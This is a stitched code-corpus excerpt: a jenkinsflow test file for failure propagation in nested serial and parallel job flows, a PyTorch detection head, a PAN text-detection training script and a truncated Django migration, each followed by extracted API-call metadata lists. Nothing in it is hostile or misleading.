api.job('j22_fail', exec_time=0.01, max_fails=1, expect_invocations=1, expect_order=1)
api.job('j23', exec_time=0.01, max_fails=0, expect_invocations=1, expect_order=1)
with parallel(api, timeout=70, job_name_prefix=api.job_name_prefix, report_interval=3) as ctrl1:
ctrl1.invoke('j11')
with ctrl1.parallel(propagation=Propagation.FAILURE_TO_UNSTABLE) as ctrl2:
ctrl2.invoke('j21')
ctrl2.invoke('j22_fail')
ctrl2.invoke('j23')
def test_propagation_warn_only_nested_serial_serial_continue(api_type, fake_java):
with api_select.api(__file__, api_type, login=True) as api:
pre_existing_fake_cli(api_type)
api.flow_job()
api.job('j11', exec_time=0.01, max_fails=0, expect_invocations=1, expect_order=1)
api.job('j21', exec_time=0.01, max_fails=0, expect_invocations=1, expect_order=2)
api.job('j22_fail', exec_time=0.01, max_fails=1, expect_invocations=1, expect_order=3)
api.job('j23', exec_time=0.01, max_fails=0, expect_invocations=1, expect_order=4)
with serial(api, timeout=70, job_name_prefix=api.job_name_prefix, report_interval=3) as ctrl1:
ctrl1.invoke('j11')
with ctrl1.serial() as ctrl2:
ctrl2.invoke('j21')
with ctrl2.serial(propagation=Propagation.FAILURE_TO_UNSTABLE) as ctrl3:
ctrl3.invoke('j22_fail')
ctrl2.invoke('j23')
def test_propagation_warn_only_nested_parallel_serial_continue(api_type, fake_java):
with api_select.api(__file__, api_type, login=True) as api:
pre_existing_fake_cli(api_type)
api.flow_job()
api.job('j11', exec_time=0.01, max_fails=0, expect_invocations=1, expect_order=1)
api.job('j21', exec_time=0.01, max_fails=0, expect_invocations=1, expect_order=1)
api.job('j22_fail', exec_time=0.01, max_fails=1, expect_invocations=1, expect_order=1)
api.job('j23', exec_time=0.01, max_fails=0, expect_invocations=1, expect_order=1)
with parallel(api, timeout=70, job_name_prefix=api.job_name_prefix, report_interval=3) as ctrl1:
ctrl1.invoke('j11')
with ctrl1.serial() as ctrl2:
ctrl2.invoke('j21')
with ctrl2.serial(propagation=Propagation.FAILURE_TO_UNSTABLE) as ctrl3:
ctrl3.invoke('j22_fail')
ctrl2.invoke('j23')
def test_propagation_warn_only_nested_serial_serial_continue_fail(api_type):
with api_select.api(__file__, api_type, login=True) as api:
pre_existing_fake_cli(api_type)
api.flow_job()
api.job('j11', exec_time=0.01, max_fails=0, expect_invocations=1, expect_order=1)
api.job('j21', exec_time=0.01, max_fails=0, expect_invocations=1, expect_order=2)
api.job('j22_fail', exec_time=0.01, max_fails=1, expect_invocations=1, expect_order=3)
api.job('j23_fail', exec_time=0.01, max_fails=1, expect_invocations=1, expect_order=4)
with raises(FailedChildJobException):
with serial(api, timeout=70, job_name_prefix=api.job_name_prefix, report_interval=3) as ctrl1:
ctrl1.invoke('j11')
with ctrl1.serial() as ctrl2:
ctrl2.invoke('j21')
with ctrl2.serial(propagation=Propagation.FAILURE_TO_UNSTABLE) as ctrl3:
ctrl3.invoke('j22_fail')
ctrl2.invoke('j23_fail')
def test_propagation_warn_only_nested_parallel_serial_continue_fail(api_type):
with api_select.api(__file__, api_type, login=True) as api:
pre_existing_fake_cli(api_type)
api.flow_job()
api.job('j11', exec_time=0.01, max_fails=0, expect_invocations=1, expect_order=1)
api.job('j21', exec_time=0.01, max_fails=0, expect_invocations=1, expect_order=1)
api.job('j22_fail', exec_time=0.01, max_fails=1, expect_invocations=1, expect_order=1)
api.job('j23_fail', exec_time=0.01, max_fails=1, expect_invocations=1, expect_order=1)
with raises(FailedChildJobsException):
with parallel(api, timeout=70, job_name_prefix=api.job_name_prefix, report_interval=3) as ctrl1:
ctrl1.invoke('j11')
with ctrl1.serial() as ctrl2:
ctrl2.invoke('j21')
with ctrl2.serial(propagation=Propagation.FAILURE_TO_UNSTABLE) as ctrl3:
ctrl3.invoke('j22_fail')
ctrl2.invoke('j23_fail')
| [
"jenkinsflow.flow.serial",
"jenkinsflow.flow.parallel",
"pytest.raises"
] | [((852, 980), 'jenkinsflow.flow.serial', 'serial', (['api'], {'timeout': '(70)', 'job_name_prefix': 'api.job_name_prefix', 'report_interval': '(3)', 'propagation': 'Propagation.FAILURE_TO_UNSTABLE'}), '(api, timeout=70, job_name_prefix=api.job_name_prefix,\n report_interval=3, propagation=Propagation.FAILURE_TO_UNSTABLE)\n', (858, 980), False, 'from jenkinsflow.flow import serial, parallel, FailedChildJobException, FailedChildJobsException, Propagation, BuildResult\n'), ((1637, 1767), 'jenkinsflow.flow.parallel', 'parallel', (['api'], {'timeout': '(70)', 'job_name_prefix': 'api.job_name_prefix', 'report_interval': '(3)', 'propagation': 'Propagation.FAILURE_TO_UNSTABLE'}), '(api, timeout=70, job_name_prefix=api.job_name_prefix,\n report_interval=3, propagation=Propagation.FAILURE_TO_UNSTABLE)\n', (1645, 1767), False, 'from jenkinsflow.flow import serial, parallel, FailedChildJobException, FailedChildJobsException, Propagation, BuildResult\n'), ((2438, 2517), 'jenkinsflow.flow.serial', 'serial', (['api'], {'timeout': '(70)', 'job_name_prefix': 'api.job_name_prefix', 'report_interval': '(3)'}), '(api, timeout=70, job_name_prefix=api.job_name_prefix, report_interval=3)\n', (2444, 2517), False, 'from jenkinsflow.flow import serial, parallel, FailedChildJobException, FailedChildJobsException, Propagation, BuildResult\n'), ((3361, 3446), 'jenkinsflow.flow.parallel', 'parallel', (['api'], {'timeout': '(70)', 'job_name_prefix': 'api.job_name_prefix', 'report_interval': '(3)'}), '(api, timeout=70, job_name_prefix=api.job_name_prefix,\n report_interval=3)\n', (3369, 3446), False, 'from jenkinsflow.flow import serial, parallel, FailedChildJobException, FailedChildJobsException, Propagation, BuildResult\n'), ((4269, 4348), 'jenkinsflow.flow.serial', 'serial', (['api'], {'timeout': '(70)', 'job_name_prefix': 'api.job_name_prefix', 'report_interval': '(3)'}), '(api, timeout=70, job_name_prefix=api.job_name_prefix, report_interval=3)\n', (4275, 4348), False, 'from 
jenkinsflow.flow import serial, parallel, FailedChildJobException, FailedChildJobsException, Propagation, BuildResult\n'), ((5176, 5261), 'jenkinsflow.flow.parallel', 'parallel', (['api'], {'timeout': '(70)', 'job_name_prefix': 'api.job_name_prefix', 'report_interval': '(3)'}), '(api, timeout=70, job_name_prefix=api.job_name_prefix,\n report_interval=3)\n', (5184, 5261), False, 'from jenkinsflow.flow import serial, parallel, FailedChildJobException, FailedChildJobsException, Propagation, BuildResult\n'), ((6092, 6171), 'jenkinsflow.flow.serial', 'serial', (['api'], {'timeout': '(70)', 'job_name_prefix': 'api.job_name_prefix', 'report_interval': '(3)'}), '(api, timeout=70, job_name_prefix=api.job_name_prefix, report_interval=3)\n', (6098, 6171), False, 'from jenkinsflow.flow import serial, parallel, FailedChildJobException, FailedChildJobsException, Propagation, BuildResult\n'), ((7056, 7141), 'jenkinsflow.flow.parallel', 'parallel', (['api'], {'timeout': '(70)', 'job_name_prefix': 'api.job_name_prefix', 'report_interval': '(3)'}), '(api, timeout=70, job_name_prefix=api.job_name_prefix,\n report_interval=3)\n', (7064, 7141), False, 'from jenkinsflow.flow import serial, parallel, FailedChildJobException, FailedChildJobsException, Propagation, BuildResult\n'), ((8019, 8050), 'pytest.raises', 'raises', (['FailedChildJobException'], {}), '(FailedChildJobException)\n', (8025, 8050), False, 'from pytest import raises\n'), ((9061, 9093), 'pytest.raises', 'raises', (['FailedChildJobsException'], {}), '(FailedChildJobsException)\n', (9067, 9093), False, 'from pytest import raises\n'), ((8069, 8148), 'jenkinsflow.flow.serial', 'serial', (['api'], {'timeout': '(70)', 'job_name_prefix': 'api.job_name_prefix', 'report_interval': '(3)'}), '(api, timeout=70, job_name_prefix=api.job_name_prefix, report_interval=3)\n', (8075, 8148), False, 'from jenkinsflow.flow import serial, parallel, FailedChildJobException, FailedChildJobsException, Propagation, BuildResult\n'), ((9112, 9197), 
'jenkinsflow.flow.parallel', 'parallel', (['api'], {'timeout': '(70)', 'job_name_prefix': 'api.job_name_prefix', 'report_interval': '(3)'}), '(api, timeout=70, job_name_prefix=api.job_name_prefix,\n report_interval=3)\n', (9120, 9197), False, 'from jenkinsflow.flow import serial, parallel, FailedChildJobException, FailedChildJobsException, Propagation, BuildResult\n')] |
import torch
from torch import nn
from net.init_net import xavier_init
from net.basic_cnn import DWConvBnReluPool
"""
DW-DW-PW
"""
class Head(nn.Module):
def __init__(self,reg_max = 8, #defalut =8个bbox,用于分布, general focal loss format
inChannels = 96, #
clsOutChannels = 7):
super(Head, self).__init__()
self.reg_max = reg_max
self.inChannels = inChannels
self.clsOutChannels = clsOutChannels
self.makeLayers()
def makeLayers(self):
self.head= nn.ModuleList()
for i in range(2):
conv = DWConvBnReluPool(self.inChannels,self.inChannels, kernelSize = 3, stride = 1,
bias = True, bn = True, relu = True, maxp2 = False)
self.head.append(conv)
conv = nn.Conv2d(self.inChannels,
self.clsOutChannels + 4 * (self.reg_max),
1)
self.head.append(conv)
def init_weight(self):
for conv in self.modules():
if isinstance(conv, nn.Conv2d):
xavier_init(conv, distribution='uniform')
def forward(self, x):
for conv in self.head:
x = conv(x)
return x
if __name__ == '__main__':
from torchsummary import summary
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
net = Head().to(device)
summary(net, (96, 320, 320))
# net = nanodet_PAN(cfg)
# import netron
# import os
#
# x = torch.rand(2,58,320,320)
# net(x)
# name = os.path.basename(__file__)
# name = name.split('.')[0]
# onnx_path = '/media/q/deep/me/model/pytorch_script_use/'+name+'.onnx'
# torch.onnx.export(net, x, onnx_path)
# netron.start(onnx_path)
| [
"net.init_net.xavier_init",
"torch.nn.ModuleList",
"net.basic_cnn.DWConvBnReluPool",
"torch.nn.Conv2d",
"torch.cuda.is_available",
"torchsummary.summary"
] | [((1402, 1430), 'torchsummary.summary', 'summary', (['net', '(96, 320, 320)'], {}), '(net, (96, 320, 320))\n', (1409, 1430), False, 'from torchsummary import summary\n'), ((535, 550), 'torch.nn.ModuleList', 'nn.ModuleList', ([], {}), '()\n', (548, 550), False, 'from torch import nn\n'), ((814, 883), 'torch.nn.Conv2d', 'nn.Conv2d', (['self.inChannels', '(self.clsOutChannels + 4 * self.reg_max)', '(1)'], {}), '(self.inChannels, self.clsOutChannels + 4 * self.reg_max, 1)\n', (823, 883), False, 'from torch import nn\n'), ((597, 719), 'net.basic_cnn.DWConvBnReluPool', 'DWConvBnReluPool', (['self.inChannels', 'self.inChannels'], {'kernelSize': '(3)', 'stride': '(1)', 'bias': '(True)', 'bn': '(True)', 'relu': '(True)', 'maxp2': '(False)'}), '(self.inChannels, self.inChannels, kernelSize=3, stride=1,\n bias=True, bn=True, relu=True, maxp2=False)\n', (613, 719), False, 'from net.basic_cnn import DWConvBnReluPool\n'), ((1332, 1357), 'torch.cuda.is_available', 'torch.cuda.is_available', ([], {}), '()\n', (1355, 1357), False, 'import torch\n'), ((1089, 1130), 'net.init_net.xavier_init', 'xavier_init', (['conv'], {'distribution': '"""uniform"""'}), "(conv, distribution='uniform')\n", (1100, 1130), False, 'from net.init_net import xavier_init\n')] |
'''
THis is the main training code.
'''
import os
os.environ["CUDA_VISIBLE_DEVICES"] = "0" # set GPU id at the very begining
import argparse
import random
import math
import numpy as np
import torch
import torch.nn.parallel
import torch.optim as optim
import torch.utils.data
import torch.nn.functional as F
from torch.multiprocessing import freeze_support
import json
import sys
import time
import pdb
# internal package
from dataset import ctw1500, totaltext, synthtext, msra, ic15, custom
from models.pan import PAN
from loss.loss import loss
from utils.helper import adjust_learning_rate, upsample
from utils.average_meter import AverageMeter
torch.set_num_threads(2)
# main function:
if __name__ == '__main__':
freeze_support()
parser = argparse.ArgumentParser()
parser.add_argument(
'--batch', type=int, default=16, help='input batch size')
parser.add_argument(
'--worker', type=int, default=4, help='number of data loading workers')
parser.add_argument(
'--epoch', type=int, default=601, help='number of epochs')
parser.add_argument('--output', type=str, default='outputs', help='output folder name')
parser.add_argument('--model', type=str, default='', help='model path')
parser.add_argument('--dataset_type', type=str, default='ctw', help="dataset type - ctw | tt | synthtext | msra | ic15 | custom")
parser.add_argument('--gpu', type=bool, default=False, help="GPU being used or not")
opt = parser.parse_args()
print(opt)
opt.manualSeed = random.randint(1, 10000) # fix seed
print("Random Seed:", opt.manualSeed)
random.seed(opt.manualSeed)
torch.manual_seed(opt.manualSeed)
torch.cuda.manual_seed(opt.manualSeed)
np.random.seed(opt.manualSeed)
# turn on GPU for models:
if opt.gpu == False:
device = torch.device("cpu")
print("CPU being used!")
else:
if torch.cuda.is_available() == True and opt.gpu == True:
device = torch.device("cuda")
print("GPU being used!")
else:
device = torch.device("cpu")
print("CPU being used!")
# set training parameters
batch_size = opt.batch
neck_channel = (64, 128, 256, 512)
pa_in_channels = 512
hidden_dim = 128
num_classes = 6
loss_text_weight = 1.0
loss_kernel_weight = 0.5
loss_emb_weight = 0.25
opt.optimizer = 'Adam'
opt.lr = 1e-3
opt.schedule = 'polylr'
epochs = opt.epoch
worker = opt.worker
dataset_type = opt.dataset_type
output_path = opt.output
trained_model_path = opt.model
# create dataset
print("Create dataset......")
if dataset_type == 'ctw': # ctw dataset
train_dataset = ctw1500.PAN_CTW(split='train',
is_transform=True,
img_size=640,
short_size=640,
kernel_scale=0.7,
report_speed=False)
elif dataset_type == 'tt': # totaltext dataset
train_dataset = totaltext.PAN_TT(split='train',
is_transform=True,
img_size=640,
short_size=640,
kernel_scale=0.7,
with_rec=False,
report_speed=False)
elif dataset_type == 'synthtext': # synthtext dataset
train_dataset = synthtext.PAN_Synth(is_transform=True,
img_size=640,
short_size=640,
kernel_scale=0.5,
with_rec=False)
elif dataset_type == 'msra': # msra dataset
train_dataset = msra.PAN_MSRA(split='train',
is_transform=True,
img_size=736,
short_size=736,
kernel_scale=0.7,
report_speed=False)
elif dataset_type == 'ic15': # msra dataset
train_dataset = ic15.PAN_IC15(split='train',
is_transform=True,
img_size=736,
short_size=736,
kernel_scale=0.5,
with_rec=False)
elif dataset_type == 'custom': # msra dataset
train_dataset = custom.PAN_CTW(split='train',
is_transform=True,
img_size=640,
short_size=640,
kernel_scale=0.7,
report_speed=False)
else:
print("Not supported yet!")
exit(1)
# make dataloader
train_dataloader = torch.utils.data.DataLoader(
train_dataset,
batch_size=batch_size,
shuffle=True,
num_workers=int(worker),
drop_last=True,
pin_memory=True)
print("Length of train dataset is:", len(train_dataset))
# make model output folder
try:
os.makedirs(output_path)
except OSError:
pass
# create model
print("Create model......")
model = PAN(pretrained=False, neck_channel=neck_channel, pa_in_channels=pa_in_channels, hidden_dim=hidden_dim, num_classes=num_classes)
if trained_model_path != '':
if torch.cuda.is_available() == True and opt.gpu == True:
model.load_state_dict(torch.load(trained_model_path, map_location=lambda storage, loc: storage), strict=False)
model = torch.nn.DataParallel(model).to(device)
else:
model.load_state_dict(torch.load(trained_model_path, map_location=lambda storage, loc: storage), strict=False)
else:
if torch.cuda.is_available() == True and opt.gpu == True:
model = torch.nn.DataParallel(model).to(device)
else:
model = model.to(device)
if opt.optimizer == 'SGD':
optimizer = optim.SGD(model.parameters(), lr=opt.lr, momentum=0.99, weight_decay=5e-4)
elif opt.optimizer == 'Adam':
optimizer = optim.Adam(model.parameters(), lr=opt.lr)
else:
print("Error: Please specify correct optimizer!")
exit(1)
# train, evaluate, and save model
print("Training starts......")
start_epoch = 0
for epoch in range(start_epoch, epochs):
print('Epoch: [%d | %d]' % (epoch + 1, epochs))
model.train()
# meters
losses = AverageMeter()
losses_text = AverageMeter()
losses_kernels = AverageMeter()
losses_emb = AverageMeter()
losses_rec = AverageMeter()
ious_text = AverageMeter()
ious_kernel = AverageMeter()
for iter, data in enumerate(train_dataloader):
# adjust learning rate
adjust_learning_rate(optimizer, train_dataloader, epoch, iter, opt.schedule, opt.lr, epochs)
outputs = dict()
# forward for detection output
det_out = model(data['imgs'].to(device))
det_out = upsample(det_out, data['imgs'].size())
# retreive ground truth labels
gt_texts = data['gt_texts'].to(device)
gt_kernels = data['gt_kernels'].to(device)
training_masks = data['training_masks'].to(device)
gt_instances = data['gt_instances'].to(device)
gt_bboxes = data['gt_bboxes'].to(device)
# calculate total loss
det_loss = loss(det_out, gt_texts, gt_kernels, training_masks, gt_instances, gt_bboxes, loss_text_weight, loss_kernel_weight, loss_emb_weight)
outputs.update(det_loss)
# detection loss
loss_text = torch.mean(outputs['loss_text'])
losses_text.update(loss_text.item())
loss_kernels = torch.mean(outputs['loss_kernels'])
losses_kernels.update(loss_kernels.item())
loss_emb = torch.mean(outputs['loss_emb'])
losses_emb.update(loss_emb.item())
loss_total = loss_text + loss_kernels + loss_emb
iou_text = torch.mean(outputs['iou_text'])
ious_text.update(iou_text.item())
iou_kernel = torch.mean(outputs['iou_kernel'])
ious_kernel.update(iou_kernel.item())
losses.update(loss_total.item())
# backward
optimizer.zero_grad()
loss_total.backward()
optimizer.step()
# print log
#print("batch: {} / total batch: {}".format(iter+1, len(train_dataloader)))
if iter % 20 == 0:
output_log = '({batch}/{size}) LR: {lr:.6f} | ' \
'Loss: {loss:.3f} | ' \
'Loss (text/kernel/emb): {loss_text:.3f}/{loss_kernel:.3f}/{loss_emb:.3f} ' \
'| IoU (text/kernel): {iou_text:.3f}/{iou_kernel:.3f}'.format(
batch=iter + 1,
size=len(train_dataloader),
lr=optimizer.param_groups[0]['lr'],
loss_text=losses_text.avg,
loss_kernel=losses_kernels.avg,
loss_emb=losses_emb.avg,
loss=losses.avg,
iou_text=ious_text.avg,
iou_kernel=ious_kernel.avg,
)
print(output_log)
sys.stdout.flush()
with open(os.path.join(output_path,'statistics.txt'), 'a') as f:
f.write("{} {} {} {} {} {}\n".format(losses_text.avg, losses_kernels.avg, losses_emb.avg, losses.avg, ious_text.avg, ious_kernel.avg))
if epoch % 20 == 0:
print("Save model......")
if torch.cuda.is_available() == True and opt.gpu == True:
torch.save(model.module.state_dict(), '%s/model_epoch_%s.pth' % (output_path, str(epoch)))
else:
torch.save(model.state_dict(), '%s/model_epoch_%s.pth' % (output_path, str(epoch))) | [
"dataset.synthtext.PAN_Synth",
"torch.cuda.is_available",
"torch.multiprocessing.freeze_support",
"loss.loss.loss",
"argparse.ArgumentParser",
"models.pan.PAN",
"torch.mean",
"dataset.custom.PAN_CTW",
"torch.set_num_threads",
"numpy.random.seed",
"sys.stdout.flush",
"dataset.ic15.PAN_IC15",
... | [((647, 671), 'torch.set_num_threads', 'torch.set_num_threads', (['(2)'], {}), '(2)\n', (668, 671), False, 'import torch\n'), ((720, 736), 'torch.multiprocessing.freeze_support', 'freeze_support', ([], {}), '()\n', (734, 736), False, 'from torch.multiprocessing import freeze_support\n'), ((750, 775), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {}), '()\n', (773, 775), False, 'import argparse\n'), ((1523, 1547), 'random.randint', 'random.randint', (['(1)', '(10000)'], {}), '(1, 10000)\n', (1537, 1547), False, 'import random\n'), ((1606, 1633), 'random.seed', 'random.seed', (['opt.manualSeed'], {}), '(opt.manualSeed)\n', (1617, 1633), False, 'import random\n'), ((1638, 1671), 'torch.manual_seed', 'torch.manual_seed', (['opt.manualSeed'], {}), '(opt.manualSeed)\n', (1655, 1671), False, 'import torch\n'), ((1676, 1714), 'torch.cuda.manual_seed', 'torch.cuda.manual_seed', (['opt.manualSeed'], {}), '(opt.manualSeed)\n', (1698, 1714), False, 'import torch\n'), ((1719, 1749), 'numpy.random.seed', 'np.random.seed', (['opt.manualSeed'], {}), '(opt.manualSeed)\n', (1733, 1749), True, 'import numpy as np\n'), ((5596, 5728), 'models.pan.PAN', 'PAN', ([], {'pretrained': '(False)', 'neck_channel': 'neck_channel', 'pa_in_channels': 'pa_in_channels', 'hidden_dim': 'hidden_dim', 'num_classes': 'num_classes'}), '(pretrained=False, neck_channel=neck_channel, pa_in_channels=\n pa_in_channels, hidden_dim=hidden_dim, num_classes=num_classes)\n', (5599, 5728), False, 'from models.pan import PAN\n'), ((1827, 1846), 'torch.device', 'torch.device', (['"""cpu"""'], {}), "('cpu')\n", (1839, 1846), False, 'import torch\n'), ((2718, 2840), 'dataset.ctw1500.PAN_CTW', 'ctw1500.PAN_CTW', ([], {'split': '"""train"""', 'is_transform': '(True)', 'img_size': '(640)', 'short_size': '(640)', 'kernel_scale': '(0.7)', 'report_speed': '(False)'}), "(split='train', is_transform=True, img_size=640, short_size=\n 640, kernel_scale=0.7, report_speed=False)\n", (2733, 2840), False, 'from 
dataset import ctw1500, totaltext, synthtext, msra, ic15, custom\n'), ((5474, 5498), 'os.makedirs', 'os.makedirs', (['output_path'], {}), '(output_path)\n', (5485, 5498), False, 'import os\n'), ((6892, 6906), 'utils.average_meter.AverageMeter', 'AverageMeter', ([], {}), '()\n', (6904, 6906), False, 'from utils.average_meter import AverageMeter\n'), ((6929, 6943), 'utils.average_meter.AverageMeter', 'AverageMeter', ([], {}), '()\n', (6941, 6943), False, 'from utils.average_meter import AverageMeter\n'), ((6969, 6983), 'utils.average_meter.AverageMeter', 'AverageMeter', ([], {}), '()\n', (6981, 6983), False, 'from utils.average_meter import AverageMeter\n'), ((7005, 7019), 'utils.average_meter.AverageMeter', 'AverageMeter', ([], {}), '()\n', (7017, 7019), False, 'from utils.average_meter import AverageMeter\n'), ((7041, 7055), 'utils.average_meter.AverageMeter', 'AverageMeter', ([], {}), '()\n', (7053, 7055), False, 'from utils.average_meter import AverageMeter\n'), ((7076, 7090), 'utils.average_meter.AverageMeter', 'AverageMeter', ([], {}), '()\n', (7088, 7090), False, 'from utils.average_meter import AverageMeter\n'), ((7113, 7127), 'utils.average_meter.AverageMeter', 'AverageMeter', ([], {}), '()\n', (7125, 7127), False, 'from utils.average_meter import AverageMeter\n'), ((1977, 1997), 'torch.device', 'torch.device', (['"""cuda"""'], {}), "('cuda')\n", (1989, 1997), False, 'import torch\n'), ((2070, 2089), 'torch.device', 'torch.device', (['"""cpu"""'], {}), "('cpu')\n", (2082, 2089), False, 'import torch\n'), ((3111, 3250), 'dataset.totaltext.PAN_TT', 'totaltext.PAN_TT', ([], {'split': '"""train"""', 'is_transform': '(True)', 'img_size': '(640)', 'short_size': '(640)', 'kernel_scale': '(0.7)', 'with_rec': '(False)', 'report_speed': '(False)'}), "(split='train', is_transform=True, img_size=640, short_size\n =640, kernel_scale=0.7, with_rec=False, report_speed=False)\n", (3127, 3250), False, 'from dataset import ctw1500, totaltext, synthtext, msra, ic15, 
custom\n'), ((7244, 7340), 'utils.helper.adjust_learning_rate', 'adjust_learning_rate', (['optimizer', 'train_dataloader', 'epoch', 'iter', 'opt.schedule', 'opt.lr', 'epochs'], {}), '(optimizer, train_dataloader, epoch, iter, opt.schedule,\n opt.lr, epochs)\n', (7264, 7340), False, 'from utils.helper import adjust_learning_rate, upsample\n'), ((7918, 8053), 'loss.loss.loss', 'loss', (['det_out', 'gt_texts', 'gt_kernels', 'training_masks', 'gt_instances', 'gt_bboxes', 'loss_text_weight', 'loss_kernel_weight', 'loss_emb_weight'], {}), '(det_out, gt_texts, gt_kernels, training_masks, gt_instances, gt_bboxes,\n loss_text_weight, loss_kernel_weight, loss_emb_weight)\n', (7922, 8053), False, 'from loss.loss import loss\n'), ((8153, 8185), 'torch.mean', 'torch.mean', (["outputs['loss_text']"], {}), "(outputs['loss_text'])\n", (8163, 8185), False, 'import torch\n'), ((8263, 8298), 'torch.mean', 'torch.mean', (["outputs['loss_kernels']"], {}), "(outputs['loss_kernels'])\n", (8273, 8298), False, 'import torch\n'), ((8378, 8409), 'torch.mean', 'torch.mean', (["outputs['loss_emb']"], {}), "(outputs['loss_emb'])\n", (8388, 8409), False, 'import torch\n'), ((8543, 8574), 'torch.mean', 'torch.mean', (["outputs['iou_text']"], {}), "(outputs['iou_text'])\n", (8553, 8574), False, 'import torch\n'), ((8646, 8679), 'torch.mean', 'torch.mean', (["outputs['iou_kernel']"], {}), "(outputs['iou_kernel'])\n", (8656, 8679), False, 'import torch\n'), ((1901, 1926), 'torch.cuda.is_available', 'torch.cuda.is_available', ([], {}), '()\n', (1924, 1926), False, 'import torch\n'), ((3574, 3680), 'dataset.synthtext.PAN_Synth', 'synthtext.PAN_Synth', ([], {'is_transform': '(True)', 'img_size': '(640)', 'short_size': '(640)', 'kernel_scale': '(0.5)', 'with_rec': '(False)'}), '(is_transform=True, img_size=640, short_size=640,\n kernel_scale=0.5, with_rec=False)\n', (3593, 3680), False, 'from dataset import ctw1500, totaltext, synthtext, msra, ic15, custom\n'), ((5769, 5794), 'torch.cuda.is_available', 
'torch.cuda.is_available', ([], {}), '()\n', (5792, 5794), False, 'import torch\n'), ((5858, 5931), 'torch.load', 'torch.load', (['trained_model_path'], {'map_location': '(lambda storage, loc: storage)'}), '(trained_model_path, map_location=lambda storage, loc: storage)\n', (5868, 5931), False, 'import torch\n'), ((6055, 6128), 'torch.load', 'torch.load', (['trained_model_path'], {'map_location': '(lambda storage, loc: storage)'}), '(trained_model_path, map_location=lambda storage, loc: storage)\n', (6065, 6128), False, 'import torch\n'), ((6165, 6190), 'torch.cuda.is_available', 'torch.cuda.is_available', ([], {}), '()\n', (6188, 6190), False, 'import torch\n'), ((9852, 9870), 'sys.stdout.flush', 'sys.stdout.flush', ([], {}), '()\n', (9868, 9870), False, 'import sys\n'), ((3925, 4045), 'dataset.msra.PAN_MSRA', 'msra.PAN_MSRA', ([], {'split': '"""train"""', 'is_transform': '(True)', 'img_size': '(736)', 'short_size': '(736)', 'kernel_scale': '(0.7)', 'report_speed': '(False)'}), "(split='train', is_transform=True, img_size=736, short_size=\n 736, kernel_scale=0.7, report_speed=False)\n", (3938, 4045), False, 'from dataset import ctw1500, totaltext, synthtext, msra, ic15, custom\n'), ((5967, 5995), 'torch.nn.DataParallel', 'torch.nn.DataParallel', (['model'], {}), '(model)\n', (5988, 5995), False, 'import torch\n'), ((6240, 6268), 'torch.nn.DataParallel', 'torch.nn.DataParallel', (['model'], {}), '(model)\n', (6261, 6268), False, 'import torch\n'), ((10189, 10214), 'torch.cuda.is_available', 'torch.cuda.is_available', ([], {}), '()\n', (10212, 10214), False, 'import torch\n'), ((4303, 4419), 'dataset.ic15.PAN_IC15', 'ic15.PAN_IC15', ([], {'split': '"""train"""', 'is_transform': '(True)', 'img_size': '(736)', 'short_size': '(736)', 'kernel_scale': '(0.5)', 'with_rec': '(False)'}), "(split='train', is_transform=True, img_size=736, short_size=\n 736, kernel_scale=0.5, with_rec=False)\n", (4316, 4419), False, 'from dataset import ctw1500, totaltext, synthtext, msra, 
ic15, custom\n'), ((9897, 9940), 'os.path.join', 'os.path.join', (['output_path', '"""statistics.txt"""'], {}), "(output_path, 'statistics.txt')\n", (9909, 9940), False, 'import os\n'), ((4679, 4800), 'dataset.custom.PAN_CTW', 'custom.PAN_CTW', ([], {'split': '"""train"""', 'is_transform': '(True)', 'img_size': '(640)', 'short_size': '(640)', 'kernel_scale': '(0.7)', 'report_speed': '(False)'}), "(split='train', is_transform=True, img_size=640, short_size=\n 640, kernel_scale=0.7, report_speed=False)\n", (4693, 4800), False, 'from dataset import ctw1500, totaltext, synthtext, msra, ic15, custom\n')] |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
from django.conf import settings
class Migration(migrations.Migration):
dependencies = [
('library', '0011_auto_20150706_0957'),
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('reviews', '0013_auto_20150708_1511'),
]
operations = [
migrations.CreateModel(
name='Study',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('status', models.CharField(default='U', max_length=1, choices=[('U', 'Unclassified'), ('R', 'Rejected'), ('A', 'Accepted'), ('D', 'Duplicated')])),
('updated_at', models.DateTimeField(auto_now=True)),
('document', models.ForeignKey(to='library.Document')),
],
),
migrations.CreateModel(
name='StudySelection',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('has_finished', models.BooleanField(default=False)),
('review', models.ForeignKey(to='reviews.Review')),
('user', models.ForeignKey(to=settings.AUTH_USER_MODEL, null=True)),
],
),
migrations.AddField(
model_name='study',
name='study_selection',
field=models.ForeignKey(to='reviews.StudySelection'),
),
]
| [
"django.db.models.ForeignKey",
"django.db.models.BooleanField",
"django.db.models.AutoField",
"django.db.models.DateTimeField",
"django.db.migrations.swappable_dependency",
"django.db.models.CharField"
] | [((258, 315), 'django.db.migrations.swappable_dependency', 'migrations.swappable_dependency', (['settings.AUTH_USER_MODEL'], {}), '(settings.AUTH_USER_MODEL)\n', (289, 315), False, 'from django.db import models, migrations\n'), ((1484, 1530), 'django.db.models.ForeignKey', 'models.ForeignKey', ([], {'to': '"""reviews.StudySelection"""'}), "(to='reviews.StudySelection')\n", (1501, 1530), False, 'from django.db import models, migrations\n'), ((493, 586), 'django.db.models.AutoField', 'models.AutoField', ([], {'verbose_name': '"""ID"""', 'serialize': '(False)', 'auto_created': '(True)', 'primary_key': '(True)'}), "(verbose_name='ID', serialize=False, auto_created=True,\n primary_key=True)\n", (509, 586), False, 'from django.db import models, migrations\n'), ((612, 751), 'django.db.models.CharField', 'models.CharField', ([], {'default': '"""U"""', 'max_length': '(1)', 'choices': "[('U', 'Unclassified'), ('R', 'Rejected'), ('A', 'Accepted'), ('D',\n 'Duplicated')]"}), "(default='U', max_length=1, choices=[('U', 'Unclassified'),\n ('R', 'Rejected'), ('A', 'Accepted'), ('D', 'Duplicated')])\n", (628, 751), False, 'from django.db import models, migrations\n'), ((781, 816), 'django.db.models.DateTimeField', 'models.DateTimeField', ([], {'auto_now': '(True)'}), '(auto_now=True)\n', (801, 816), False, 'from django.db import models, migrations\n'), ((848, 888), 'django.db.models.ForeignKey', 'models.ForeignKey', ([], {'to': '"""library.Document"""'}), "(to='library.Document')\n", (865, 888), False, 'from django.db import models, migrations\n'), ((1028, 1121), 'django.db.models.AutoField', 'models.AutoField', ([], {'verbose_name': 